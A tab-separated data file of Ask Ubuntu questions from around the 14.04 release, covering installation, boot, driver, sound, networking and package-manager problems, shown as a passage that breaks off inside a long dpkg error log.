448849	bad substitution error in appending a variable to a filename ( renaming file )	i tried to append a variable value to a filename and get the file name as : page_variablevalue it gives bad substitution error when at line : mv `` $ page.txt '' `` page_ $ { variablevalue } .txt '' please help .
448851	problem at installing , black screen	im new to ubuntu , and never have install it in any computer . could someone help me with this problem . i downloaded lubuntu 13.10 today and burn the iso to a cd . now , i want to install it to an old laptop from 2000 its a dell inspiron 2600 , it has 320 of ram . ok so the problem is that i place the disc and the lubuntu screen comes up , i click on install lubuntu and i get a black screen with a white cursor just blinking . hopefully there 's a solution for this . please and thank you . p.s the laptop still has windows xp and i would like to get rid of it too.. its too slow the computer .
448857	having problems getting display 's correct	i have a dell computer and it has a 17 '' display that seems to run at 75.1hz 1024 x 768 . it looks great at that and no problem . but i want to use this computer to watch movies on my tv which is a 51 '' panasonic tv that is hdmi 1920 x 1080p at 60hz . the problem is if i bring it up and can get it working the 17 '' display shows up on the panasonic upper left corner taking up half the screen . i have tired setting as to the right or left with no luck . also it shows the the display as a panasonic industry company 32 '' some times the computer comes up at 640x480 on both display and as mirror display . i know i am a newbie to ubuntu , but how can i correct this and make it a permanent so that i have both display 's working and each with it 's correct display resolution . i really have n't ' been able to do much since every time it comes up it is a challenge to just get it to work .
448858	in what time 14.04 will be released ?	i actually mean todays hour and minutes according to south africa time ?
448860	how can i make the goaccess package available in lucid ( 10.04 ) ?	goaccess is an open source real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems . for some reason , it appears that it is only available in the repos for 12.04 and later . i would like to make this available as a package in 10.04 , but i do not know how to go about doing that . is there a good reason why this package is not available for lucid ? the server version should be supported going into 2015 . i would prefer to remain on lucid for a while longer . i am also trying to find a solution that avoids downloading and installing programs and scripts in an ad hoc manner . can anyone shed some light on this , or point me in the right direction to start working toward a solution ?
448862	windows 7 and ubuntu 13.10 dual boot problems ?	how do i get drivers for my compaq cq45 laptop , i need lan drivers and i have already fixed wifi on both partitions . also how do i get the options to select ubuntu and w7 , it automatically boots to windows 7 , but if i pause startup i can get to it . ( is uefi enabled and i did wipe windows 8 ) . ( wifi card is a ralink rt5390 but i dont know what lan port it is )
448864	'open sans ' rendering differently on chrome vs. other operating systems	after upgrading to 14.04 , any use of the 'open sans ' on web pages renders in chrome using a very 'thin ' ( maybe the 300 weight ? ) version of the font which is almost unreadable on ubuntu - however , the same rendering seems to look fine on osx/windows as well as firefox on ubuntu . any ideas what may have changed to cause this ?
448865	hard drive does n't show up in `` computer '' , but does in bios and disk utility	i just installed ubuntu , because windows xp is no longer supported . since i only use this old pc for internet and music , i do n't want to waste money on a new pc , just for those things . installation went ok . but now that i want to load everything i backed up , my 320gb hd is n't showing up in `` computer '' , but it does show up in bios , and terminal , and disk utility ! ? can i do anything to make it show up in `` computer '' ? if so , how ? if not , then is there another way to load all my files ? i have never used linux , so bare with me , thanks .
448867	missing manpage for `ifconfig`	$ man ifconfig no manual entry for ifconfig see 'man 7 undocumented ' for help when manual pages are not available . $ dpkg -l | grep -i manpages ii manpages 3.54-1ubuntu1 all manual pages about using a gnu/linux system ii manpages-dev 3.54-1ubuntu1 all manual pages about using gnu/linux for development ii manpages-posix 2.16-1 all manual pages about using posix system ii manpages-posix-dev 2.16-1 all manual pages about using a posix system for development how do i get the ifconfig manpage installed on ubuntu 13.10 ?
448870	sound not working on new macbook pro retina running ubuntu 13.10	i have a new macbook pro retina ( late 2013 model ) running ubuntu 13.10 . i ca n't get the sound to work . i have tried the solution here , but it 's not changing anything . i also tried the following series of commands , but they do n't change anything , either : sudo apt-get remove -- purge alsa-base sudo apt-get remove -- purge pulseaudio sudo apt-get install alsa-base sudo apt-get install pulseaudio sudo alsa force-reload when i start the computer and the login screen appears , i head one sound - the sound ubuntu usually makes when there 's an error . after i log in , however , i ca n't hear anything again . the sound works perfectly on osx - it 's only ubuntu that seems to be having this problem . is there anything else i can try to get the sound to work ?
448873	start wicd before waiting for network configuration	i have a small , usually headless media server at home , and i 'm attempting to change its primary network interface from wired ethernet to wifi . to that end , i installed wicd , which seems to be great for configuring the network . however , booting the machine is taking forever because of the infamous `` waiting for network configuration '' issue . i 've already changed my /etc/network/interfaces file and changed references from eth0 to wlan0 , to no avail . what strikes me is that i 'm seeing something like : ... waiting for network configuration ... waiting 60 more seconds for network configuration continuing without network configuration ... * starting network configuration daemon wicd [ ok ] ... can i start wicd before waiting for network configuration ? should i abandon wicd and just edit some config files , and then this will all `` just work ? ''
448874	error when compiling a .bas file using freebasic : expected end-of-line , found ' [ '	i tried making a simple code to get into .bas based coding . i was using freebasic code compiler to create my codes . i tried making a simple code that will bring out any text into the terminal . read.bas file : [ code ] print `` read '' [ /code ] and then i compiled it using $ fbc -lang qb read.bas what i got was this . read.bas ( 1 ) error 3 : expected end-of-line , found ' [ ' [ code ] ^ read.bas ( 3 ) error 3 : expected end-of-line , found ' [ ' [ /code ] ^ i am new to ubuntu but i have messed around with it a bit . please help and thank you in advance .
448876	how do i install an openssl crl file ?	here 's the scenario . server : ubuntu 12.04 -- postfix and dovecot client : ubuntu 13.10 -- offlineimap and msmtp i 'm finishing off my recovery from heartbleed and want to re-issue my own server certificate . since it is a private server , i originally created a ca , then used the ca to sign the server certificate . the ca cert is properly installed on my client system , the server key and cert are installed on the server . now , i have created a crl and divined that the crl need not go on the server ( except to distribute far and wide if i had any other users ) , but does need to be installed on my desktop machine so that openssl wo n't accept the original key . so , i copied the crl file into /etc/ssl/crl . i created the link using ln -s mycrl.pem `openssl crl -hash -noout -in mycrl.pem`.0 the result of that looks reasonable . openssl s_client connections to the server just fine . no error messages that i can see in the connection , but i expect there to be all kinds of errors and possibly even a refusal to connect . so , i look in my openssl configuration file and move the crl file to /etc/ssl/crl.pem . same result : depth=1 c = us , st = tx , l = austin , o = savannidgerinel , ou = savannidgerinel , cn = savannidgerinel ca , name = savannidgerinel.com , emailaddress = savanni @ alyra.org verify return:1 depth=0 c = us , st = tx , l = austin , o = savannidgerinel , ou = savannidgerinel , cn = apps.savannidgerinel.com , name = savannidgerinel.com , emailaddress = savanni @ alyra.org verify return:1 -- - certificate chain 0 s : /c=us/st=tx/l=austin/o=savannidgerinel/ou=savannidgerinel/cn=apps.savannidgerinel.com/name=savannidgerinel.com/emailaddress=savanni @ alyra.org i : /c=us/st=tx/l=austin/o=savannidgerinel/ou=savannidgerinel/cn=savannidgerinel ca/name=savannidgerinel.com/emailaddress=savanni @ alyra.org ... tons more stuff ... . ssl-session : ... tons of sessions stuff ... verify return code : 0 ( ok ) how do i force the openssl system on my laptop to actually pay attention to revocation files ? and , given that i 'm sure that certificates get revoked regularly , why are there absolutely no other crl files on my system ? how can i be sure that i 'm actually connecting to what i think i 'm connecting to ? not to put too fine a point on it , but why is installing a revocation list difficult ? this strikes me as the kind of thing that has to be trivial for end users who know nothing in order to ensure internet security .
448877	issue with graphics on motherboard biostar	i am testing right now ubuntu 13.10 x86 on my old computer but i am having an issue whenever i try to start with unbuntu , and it gives me an error that says ¨graphics card could not be detected . you will need to configure these yourself . and it gives me some options -run in low-graphics mode for just one session -reconfigure graphics -troubleshoot the error -exit to console login if i choose the first option i got a message that says ¨stay by one minute while the display restarts¨ so i wait for more than 1 minute and i press ok button and after that nothing happen , i have waited for 30 minutes and still nothing happens , so i have to restart the computer and if i choose exit to console login , nothing happen as well only a black screen , so i have to restart the computer . and if i try the other 2 options the computer got stuck asking me the same questions at this time i dont know what to do beacuse i already tried to reinstall ubuntu like 2 times and i also tried to start ubuntu from the dvd and i always get the same scenario . my computer pentium 4 ht sockect 775 3.0 ghz 1.5 gb ram ddr2 motherboard biostar p4m800 pro m7 hdd 80 gb ide i would really appreciate if you can help me out thank you in advance
448878	upgrading ubuntu 13.10 to 14.04 lts - failure	i ran the command : sudo do-release-upgrade for upgrading ubuntu 13.10 to 14.04 lts/ but it gives the following output : no new release found so what should i do now ?
448881	gui builder for shell script	is there any gui builder tool for shell script . so that the interface can be designed by click and drag . is there any plugins for eclipse or any existing ide to do this ?
448883	change default username in livecd	i 've created a custom ubuntu image for myself using uck ( ubuntu customization kit ) . my question is : when i boot the image as a livecd or liveusb , it automatically creates and logs you in to the user ubuntu . is it possible to change this default username to something else , like myname ?
448886	macbook will not boot after ubuntu install	i have an old macbook laying around not doing much , so i decided to install ubuntu 13.04 on it , and dual boot with osx . from within osx , i repartitioned the drive , reserving half of the 250gb hdd for each osx , and ubuntu . i plugged in my bootable usb drive created using unetbootin , and booted into ubuntu . i installed the os , and rebooted my system after removing the usb . i got to the grub menu , and selected ubuntu ... the grub menu disappears , and the screen just stays the purple background color of grub . rebooted i got to the grub menu , and selected osx , i got the same purple screen , but after a short while i got this . i replugged my bootable usb and rebooted after selecting ufi boot , i see secure boot not enabled , and then the screen goes black ... what can i do to repair my macbook ? what could be causing it to no longer boot from either hdd or usb ?
448890	thoggen dvd rip assistance needed please	i try to rip a dvd and got this error message . an error occurred : could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . what is a decryption library and where do i get this library . thank you in advance for your assistance .
448894	can not create wifi hotspot	i used connectify to create hotspot in windows . in ubuntu 12.04 i want to create an hotspot , i tried ap-hotspot to create hotspot but it is showing your wireless card does not support access point mode how to create a hotspot . wifi adapter pro/wireless 5100 agn [ shiloh ] network connection
448896	sound not working ubuntu 12.04	i killed the pulseaudio with 'killall pulseaudio ' . and then reinstall pulseaudio . later i came to know that it is not just enough we have to install the few additional packages for the sound to work . i tried installing alsa-utils . but when i type in alsamixer in terminal it says no such file or directory even though it exists , i check the path variable for /usr/bin , its there and also tried /usr/bin/alsamixer in vain aplay -l -- - > throws : no soundcards when i do lspci , my intel audio card is present at the slot 00:1b.0 the following link is the alsainfo http : //www.alsa-project.org/db/ ? f=143569ef6166dc79483a5119c9e2889a9188ca8b is there anything that i can do to bring sound back to work. ? thankyou .
448898	14.04 boot takes over an hour	i have a windows 7 64bit professional dual boot with ubuntu 14.04 on a lenovo b570 , i3 with 8 gb of ram and over 100 gb free space on the 1 hd . everything worked well until 2 days ago when both oss started booting skow , and now it reached a point where it takes over an hour to load any of the oss . once the system loaded , nothing works . it 's as if once it started loading the os it gets stuck . the bios settings/boot selection as well as the grub menu works great . i ran memtest86 anfand it found 0 errors , the bios identifies all 8 gb of ram . the same thing happens when using windows 7 installation cd for recovery or ububtu live cd.. any thoughts ? thanks
448899	ubuntu 12.04 lts installation problems	i am trying to install ubuntu 12.04 lts on my compaq presario s5010il desktop with amd athlon ( tm ) xp 2400 2 ghz with 1gb ddr1 ram . i get the error message `` start loading graphic devices - fail '' . how to solve this problem ?
448900	kernel security settings	what is the right security setting for the net.ipv4.conf.all.secure_redirects option in sysctl.conf ? here it sets to 1 and here sets to 0 . is net.ipv4.conf.default.secure_redirects related to previous ? and ůwhat is the right setting for it ? ==== 1st link ( wiki.ubuntu.com ) stated : the following sysctl settings are default at the time of this writing . we intend that they stay this way . net.ipv4.conf.all.secure_redirects = 1 . prevents hijacking of routing path by only allowing redirects from gateways known in our routing table . 2nd link ( joshrendek.com ) states : # make sure no one can alter the routing tables net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.all.secure_redirects = 0 net.ipv4.conf.default.secure_redirects = 0
448901	mplayer in mobile ubuntu	can we play video by running 'mplayer absolute-file-path ' in terminal of ubuntu smartphone ? also any thoughts about providing gestures , transparent invisible buttons etc . to navigate in video as touch screen mobile without an external keyboard has so little screen which should be fully used up to display video .
448902	ubuntu 12.04 : mouse and wireless not working on startup	yesterday everything worked fine but today both the mouse/touchpad and the wireless card are not working after boot . the mouse starts to work after a sudo modprobe psmouse but i do n't know what to do with the wireless card and i do n't know the source of the problem . no updates have been installed .
448903	i installed ubuntu 13.10 `` inside '' windows 7 but windows automatically boots	i 'm new to ubuntu ( and linux in general ) , so bear with me . i burned ubuntu 13.10 to a dvd and `` tried '' ubuntu . then in the ubuntu desktop , i selected the install icon for ubuntu . i got a prompt that gave me the option to ( 1 ) install ubuntu inside windows 7 , ( 2 ) delete windows 7 , or ( 3 ) choose another option . i chose to install inside windows . after that , the screen went dark , showed the installation progress , and prompted me to eject the dvd and press enter . after doing that , my laptop restarted but booted , just as usual , automatically to windows . i ca n't figure out how to boot ubuntu now without putting the dvd back in . i 've tried looking for ubuntu as an installed program on windows but it does n't show up , except for cyberlink power2go . my system bios has dvd at the top for booting , followed by my hp notebook hard drive , and `` internal network adapter boot '' is disabled . at this point , i 'm not sure what else i can do . i 'd really appreciate any help you can give me .
448907	converting m4a to mp3 using sound converter on network attached storage	i am trying to convert m4a files to mp3 for uploading to an mp3 player that does n't support m4a . all my music is stored on a buffalo network attached storage ( nas ) and i am using soundconverter . ideally i would like to use soundconverter directly on the files on the nas , and have them convert to mp3 back to a folder on the nas . i have tried to do this directly through soundconverter . i can navigate to the m4a files on the nas through soundconverter , but when i try and move them into the conversion window either by dragging and dropping or double clicking , the conversion window goes pink and nothing happens ( there is no error message associated with this ) . however , i can get soundconverter to work by moving the m4a files onto the hard drive of my pc , converting them there and then copying the mp3 back to the nas . this adds significantly to the time and administration of the task . i have tried changing the nas read/write permissions to no avail . does anyone know of a way of achieving my aim directly ? please be gentle as i am a very new convert to ubuntu/linux as a result of windows fatigue . loving it so far but this is my first attempt at branching out into the great unknown .
448908	customizing cinnamon on ubuntu 13.10	how do you customize the windows of cinnamon , ubuntu tweak does not work , and ccsm does not work , how can i customize cinnamon , exept the theming in settings ?
448915	ca n't get latest php or pear in ubuntu 12.04 lts	i 'm attempting to install pear , and other components.. but getting the following . $ sudo apt-get install php5 libapache2-mod-php5 php5-mysql reading package lists ... done building dependency tree reading state information ... done php5-mysql is already the newest version . php5-mysql set to manually installed . libapache2-mod-php5 is already the newest version . libapache2-mod-php5 set to manually installed . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5 : depends : libapache2-mod-php5 ( > = 5.5.11+dfsg-2+deb.sury.org~precise+1 ) but 5.5.10+dfsg-1+deb.sury.org~precise+1 is to be installed or libapache2-mod-php5filter ( > = 5.5.11+dfsg-2+deb.sury.org~precise+1 ) but it is not going to be installed or php5-cgi ( > = 5.5.11+dfsg-2+deb.sury.org~precise+1 ) but it is not going to be installed or php5-fpm ( > = 5.5.11+dfsg-2+deb.sury.org~precise+1 ) but 5.5.10+dfsg-1+deb.sury.org~precise+1 is to be installed depends : php5-common ( > = 5.5.11+dfsg-2+deb.sury.org~precise+1 ) but 5.5.10+dfsg-1+deb.sury.org~precise+1 is to be installed e : unable to correct problems , you have held broken packages . i 've done the instructions found on here , for getting the ppa setup for php 5.5 .. and i 'm unclear how to proceed . after attempting the suggested post in these comments : $ sudo apt-get clean $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
448917	some programs not displaying on desktop	when i click other programs like wine , transmission , system monitor it appears on the launcher but not on the desktop . i notice that when you click their icon on the launcher , there is a blurred square which goes small and then big and finally disappears . i find this odd . other programs like firefox , libre , gimp , audacity displays properly . please help .
448918	grub rescue after removing ubuntu in windows 8.1	i could install ubuntu 12.04.4 alongside with windows 8.1 only when the bios configuration was changed to `` legacy support '' and `` legacy first '' as well as `` boot secure disabled '' using live usb . when booting up windows 8.1 , i reset bios to uefi mode . the problem arised when the bios was set to legacy mode again in order to boot up ubuntu . in the end , i uninstalled ubuntu by simply clicking the `` uninstall wubi '' icon in windows 8.1.. when i tried to reinstall ubuntu again in legacy mode by live usb , the following lines appeared . error : unknown file system grub rescue > please kindly advise how to fix the problem . note : no dvd boot-up in my computer , lenovo g710 no boot disc for window 8.1
448919	ubuntu 13.10 - nautilus encoding issue	please see the picture below : . as you can see , the names of directories and files have unreadable names . is there any way to fix this problem in ubuntu 13.10 ?
448920	ubuntu 13.10 ca n't boot into unity	i installed ubuntu 13.10 on my laptop but it wo n't boot into unity just command line and says running in low graphics mode . how do i fix this . i have an hp 15-g029wm laptop with amd radeon hd 3330 graphics
448923	software manager	i am using ubuntu 13.10 on my nec-powermate vl280 along with win 7 . my problem is that when i try to install something ( say vlc ) with software center it gets stuck and i have to force close it . this is the first time i tried to install something using software center . i am new to ubuntu . what can i do to fix it ? i tried to install vlc by running the this command sudo apt-get install vlc in the terminal and it worked . but what about the software center ?
448924	no wifi with xubuntu 12.04 on dell inspiron 8600	i 've just installed xubuntu 12.04 on an old dell inspiron 8600 laptop , because of the lack of a pae , and everything works fine except wifi . i 've followed the instructions on the wifi help page and have installed the b43legacy driver as directed , but it 's not working . i 've tried removing the bcmwl driver package , but it 's not installed .
448926	do-release-upgrade : python install is corrupted	i was upgrading from 13.10 to 14.04 ( dev for now , stable in a few hours ) using do-release-upgrade and encountered the following problem : can not upgrade your python install is corrupted . please fix the '/usr/bin/python ' symlink . i solved the problem after messing around a bit , so i 'd like to share my solution here . hope this could help someone .
448928	flash player web page issue	i am using ubuntu 13.10 . when i try to open the adobe flash player download page , firefox shows an error that it is unable to open the page . it opens other pages fine but no the above page . what can i do ?
448932	how much does ubuntu 14.04 cost ?	how much does ubuntu 14.04 cost to purchase ? also , are there different versions , such as enterprise , starter , etc ?
448937	it 's 17-04-2014 ... where 's the update to 14.04 ?	it is 17-04-2014 . so why is it still not possible to update from update manager ?
448938	do-release-upgrade : failed to configure linux-image-generic ( previous on backports kernel )	because of hardware issues i was on backports-3.11-rc3-1 with ubuntu 13.4 64bit . now , after a while i initialized do-release-upgrade . the process stopped with the message that the configuration of linux-image-generic ( or linux-headers-generic ) failed . now i am not able to boot up . i can choose the maintenance mode from grub of 3.8 or 3.9 . but same situation on both : whenever i try to start up networking or continue with normal boot the process hangs after stating that apache was started . what should be my next steps to get the system started again ?
448939	settings reset every time laptop is restarted	i am using ubuntu gnome 13.10 , and my settings always reset every time i restart my laptop ! for example , clementine library is back to empty , default browser is back to firefox , etc . i need to set my browser to chrome every i turn on my laptop . i 'm a web developer and this is so annoying . i have tried several ways like using ubuntu tweak to set default browser . but it does not work !
448940	pptp vpn wo n't reconnect after faluire	i configured a pptp vpn in /etc/network/interfaces this way : auto tunnel iface tunnel inet ppp provider server1 the link is correctly broken up on boot or when i issue ifup tunnel , but when it fails it wo n't automatically restart , i need to bring it up manually ! this is what i found in the logs : pppd [ 857 ] : no response to 4 echo-requests pppd [ 857 ] : serial link appears to be disconnected . pppd [ 857 ] : connect time 1742.1 minutes . pppd [ 857 ] : sent 82272 bytes , received 17223 bytes . pppd [ 857 ] : mppe disabled pppd [ 857 ] : connection terminated . pppd [ 857 ] : modem hangup pptp [ 833 ] : anon warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error pptp [ 833 ] : anon warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log pptp [ 842 ] : anon log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) pptp [ 842 ] : anon log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' pptp [ 842 ] : anon log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) pppd [ 857 ] : exit . am i missing an option in order to have it automatically reconnect , or is that just not implemented , and i must check vpn status via cron ?
448941	how to install mir display server ?	i 'd like to test/run ubuntu qml apps on the mir desktop preview that should be available with 14.04 . what are the steps needed to enable a native mir desktop ( preview ) session ?
448943	uac1 dac ( odac ) and ubuntu sound settings	i am trying to get ubuntu to output i2s output to my odac . when i go into sound settings , i get two options . digital output ( s/pdif ) ( iec958 , so it must actually mean s/pdif ... ) analogue output ( this is the one i am confused about ) from what i know , a dac converts digital signal to analogue . i also know that the odac supports i2s . the question i have is , which do i have to select to get i2s output via usb ? i know that the odac does not support s/pdif so it is very strange to see it there . is ubuntu displaying i2s as s/pdif incorrectly ? or does the analogue output actually mean i2s ? or would selecting the analogue output process the sound through my laptop 's dac and bypass the external dac ? any help would be greatly appreciated . thanks !
448944	where to place my local website starting with the 2.4.7 version of apache2 ?	i recently installed ubuntu 14.04 , then i installed lamp-server and placed my webpages in /var/www directory , but when i opened localhost in the browser there was nothing . i think that happened because zend updated apache . whatever the reason may be , i want to know where to keep my php files so that i can access them from my browser .
448945	serial port emulator or simulator	i am running ubuntu 12.04.2 lts on a pc with no serial ports . i have a qt application that needs to connect to a serial device . i have written a simulator for this device as well . i need a way of emulating or simulating a serial port for these two applications to communicate - they are both running on the same pc , for now . on windows , i used vspe to simulate the serial port , and that works fine . i have searched for something similar on linux . i found : socat - i have no idea how to set it up for my scenario komport - does not seem to be what i need maxicom - can not get it compiled and installed is there a way to set up socat for me to use , or another application to achieve the same result ? it need not be free .
448949	is python 2 removed from 14.04 cd images ?	i have n't seen an update on the status of removing python 2 from the cd images , and this page has last been updated late 2013 .
448953	packages are removed when i use `` apt-get install '' with a hyphen after the package name	in an attempt to install cuda , i copy-pasted some apt-get install packages . for unknown reasons the line that i got run in the end is the following : sudo apt-get install libgtk2.0- the result was that many packages got removed . randomly picking a few : libreoffice-* python-* xfce4-* the list is huge . a considerable number of system parts have been uninstalled . now this seems like a serious deviation from what i expect when i run apt-get install . what is going on ?
448960	how to remove a lot of packages installed at a particular time ?	here is the situation : say , at 17:00 , i installed a lot of packages , i can see them in the ubuntu software center history . also i can see them in the dpkg log file using the method provided by this thread . my question is : how can i delete them easily . there are so many , i ca n't delete them one by one in synaptic . the thread i linded may have explain the method . however , i ca n't see the time specified in the command , for i do n't want delete any other packages installed at other time .
448961	subprocess installed post-installation script returned error exit status 247	when i want to install any package i getting this : root @ kd32206 : ~ # apt-get install nginx reading package lists ... done building dependency tree reading state information ... done nginx is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 203 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up gconf2 ( 2.28.1-6 ) ... dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 247 dpkg : dependency problems prevent configuration of libgweather-common : libgweather-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgweather-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgweather1 : libgweather1 depends on libgweather-common ( > = 2.24.0 ) ; however : package libgweather-common is not configured yet . dpkg : error processing libgweather1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of evolution-data-server : evolution-data-server depends on libgweather1 ( > = 2.30.0 ) ; however : package libgweather1 is not configured yet . dpkg : error processing evolution-data-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent conficonfigured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports guration of evolution : evolution depends on libgweather1 ( > = 2.30.0 ) ; however : package libgweather1 is not configured yet . evolution depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . evolution depends on evolution-data-server ( > = 2.30.3 ) ; however : package evolution-data-server is not configured yet . evolution depends on evolution-data-server ( < < 2.31 ) ; however : package evolution-data-server is not configured yet . dpkg : error processing evolution ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of at-spi : at-spi depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing at-spi ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of baobab : baobab depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing baobab ( -- configure ) : dependency problems configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports - leaving unconfigured dpkg : dependency problems prevent configuration of brasero-common : brasero-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing brasero-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libbrasero-media0 : libbrasero-media0 depends on brasero-common ( > = 2.30 ) ; however : package brasero-common is not configured yet . libbrasero-media0 depends on brasero-common ( < < 2.31 ) ; however : package brasero-common is not configured yet . dpkg : error processing libbrasero-media0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of brasero : brasero depends on libbrasero-media0 ( = 2.30.3-2 ) ; however : package libbrasero-media0 is not configured yet . brasero depends on brasero-common ( > = 2.30 ) ; however : package brasero-common is not configured yet . brasero depends on brasero-common ( < < 2.31 ) ; however : package brasero-common is not configured yet . dpkg : error processing brasero ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of capplets-data : capplets-data depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing capplets-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cheese-common : cheese-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing cheese-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gstreamer0.10-plugins-good : gstreamer0.10-plugins-good depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gstreamer0.10-plugins-good ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cheese : cheese depends on cheese-common ( = 2.30.1-2 ) ; however : package cheese-common is not configured yet . cheese depends on gstreamer0.10-plugins-good ( > = 0.10.23 ) ; however : package gstreamer0.10-plugins-good is not configured yet . dpkg : error processing cheese ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomevfs2-common : libgnomevfs2-common depends on gconf2 ( > = 2.12.1-1 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgnomevfs2-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomevfs2-0 : libgnomevfs2-0 depends on libgnomevfs2-common ( > = 1:2.24 ) ; however : package libgnomevfs2-common is not configured yet . libgnomevfs2-0 depends on libgnomevfs2-common ( < < 1:2.25 ) ; however : package libgnomevfs2-common is not configured yet . dpkg : error processing libgnomevfs2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnome2-common : libgnome2-common depends on gconf2 ( > = 2.12.1-1 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgnome2-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnome2-0 : libgnome2-0 depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . libgnome2-0 depends on libgnome2-common ( > = 2.30 ) ; however : package libgnome2-common is not configured yet . libgnome2-0 depends on libgnome2-common ( < < 2.31 ) ; however : package libgnome2-common is not configured yet . dpkg : error processing libgnome2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libbonoboui2-0 : libbonoboui2-0 depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . dpkg : error processing libbonoboui2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomeui-0 : libgnomeui-0 depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . libgnomeui-0 depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . libgnomeui-0 depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . dpkg : error processing libgnomeui-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dasher-data : dasher-data depends on gconf2 ( > = 2.10.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing dasher-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dasher : dasher depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . dasher depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . dasher depends on libgnomeui-0 ( > = 2.22.0 ) ; however : package libgnomeui-0 is not configured yet . dasher depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . dasher depends on at-spi ; however : package at-spi is not configured yet . dasher depends on dasher-data ( > = 4.11-1 ) ; however : package dasher-data is not configured yet . dasher depends on dasher-data ( < < 4.12 ) ; however : package dasher-data is not configured yet . dpkg : error processing dasher ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libpanel-applet2-0 : libpanel-applet2-0 depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configuconfigured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports configured to not write apport reports red yet . dpkg : error processing libpanel-applet2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-gnome2 : python-gnome2 depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . python-gnome2 depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . python-gnome2 depends on libgnomeui-0 ( > = 2.22.0 ) ; however : package libgnomeui-0 is not configured yet . python-gnome2 depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . dpkg : error processing python-gnome2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent 